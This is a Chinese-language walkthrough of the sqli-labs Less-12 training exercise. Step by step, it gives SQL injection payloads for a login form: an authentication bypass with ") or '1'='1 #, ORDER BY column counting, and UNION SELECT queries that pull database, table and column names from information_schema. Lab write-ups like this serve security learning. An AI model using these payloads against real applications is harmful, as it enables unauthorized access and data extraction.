sqli-less12题解详细过程

sqli-less12题解

首先我们打开less12看一下
这个题目具有交互界面，有username和password，所以这里我们用不到bp进行拦截。那我们就开始找注入点。

1.在username和password 中都输入 admin 查看结果，可以正常登陆

1：
username: admin
password: admin

2.那就在username中输入 admin’测试

2：
username: admin’
password: admin

在这里发现注入点为 ")

3.那我们就根据注入点，加上万能式发现成功登陆。

3：
username: ’") or ‘1’=’1 #
password:

这里的#是注释的意思，所以password也不需要输入信息。

4.使用order by 语句判断这个表有多少列，order by 2页面回显正常，order by3页面回显不正常，说明此表一个有2列。

4：
username: ") order by 2 #
password:

5.使用 union 联合查询语句查看页面是否有显示位。

5：
username: ") union select 1,2 #
password:

6.利用sql查询语句依次爆破出数据库内的数据库名，表名，列名，字段信息

6：
username: ") union select 1,database() #
password:

在这里我们得到数据库名是 security

7：
username:") union select 1,group_concat(table_name) from information_schema.tables where table_schema = ‘security’ #
password:

在这里我们得表名为users

8：
username: ") union select 1,group_concat(column_name) from information_schema.columns where table_name = ‘users’ #
password:

通关！